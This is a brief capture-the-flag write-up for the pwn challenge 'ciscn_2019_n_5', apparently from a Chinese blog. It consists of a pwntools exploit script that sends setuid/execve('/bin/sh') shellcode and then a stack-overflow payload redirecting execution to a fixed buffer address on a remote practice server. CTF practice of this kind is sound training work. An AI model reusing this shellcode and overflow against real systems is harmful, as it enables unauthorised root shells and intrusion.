ciscn_2019_n_5

very easy

# -*- coding:utf-8 -*-
from PwnContext.core import *
local = 1
if local == 1 :
    p = remote('node3.buuoj.cn','25056')
else:
    ctx.binary = binary
    ctx.remote_libc = debug_libc
    ctx.debug_remote_libc = True
    p = ctx.start()

p.sendlineafter("name","\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05")
p.sendafter("me?","A"*0x28 + p64(0x601080))
p.interactive()

ciscn_2019_n_5_第1张图片

你可能感兴趣的:(ciscn_2019_n_5)